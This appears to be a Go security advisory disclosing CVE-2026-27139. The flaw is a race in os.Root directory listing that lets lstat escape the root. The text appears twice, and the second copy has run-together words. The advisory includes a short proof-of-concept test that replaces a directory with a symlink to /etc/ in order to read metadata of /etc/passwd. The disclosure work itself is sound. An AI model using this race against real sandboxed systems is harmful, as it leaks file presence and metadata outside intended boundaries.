There is a TOCTOU (time-of-check/time-of-use) race in listing the contents of directories within an os.Root.
On Unix platforms, when reading the contents of a directory using File.ReadDir or File.Readdir the returned os.FileInfo is populated using lstat. The lstat call can escape the root.
For example:
func Test(t *testing.T) {
dir := t.TempDir()
r, _ := os.OpenRoot(dir)
defer r.Close()
os.Mkdir(dir+"/d", 0o777)
os.WriteFile(dir+"/d/passwd", nil, 0o666)
f, _ := os.Open(dir + "/d")
defer f.Close()
ents, _ := f.ReadDir(-1)
os.RemoveAll(dir + "/d")
os.Symlink("/etc/", dir+"/d")
// fi is the FileInfo for /etc/passwd.
fi, _ := ents[0].Info()
t.Log(fi)
}The impact of this escape is limited to reading metadata provided by lstat from arbitrary locations in the filesystem. This could be used to probe for the presence or absence of files as well as gleaning metadata like file sizes, but does not permit reading or writing files outside the root.
Because of the relatively limited impact, we are classifying this a PUBLIC track vulnerability.
This is CVE-2026-27139.
There is a TOCTOU (time-of-check/time-of-use) race in listing the contents of directories within an
os.Root.On Unix platforms, when reading the contents of a directory using
File.ReadDirorFile.Readdirthe returnedos.FileInfois populated usinglstat. Thelstatcall can escape the root.For example:
The impact of this escape is limited to reading metadata provided by
lstatfrom arbitrary locations in the filesystem. This could be used to probe for the presence or absence of files as well as gleaning metadata like file sizes, but does not permit reading or writing files outside the root.Because of the relatively limited impact, we are classifying this a PUBLIC track vulnerability.
This is CVE-2026-27139.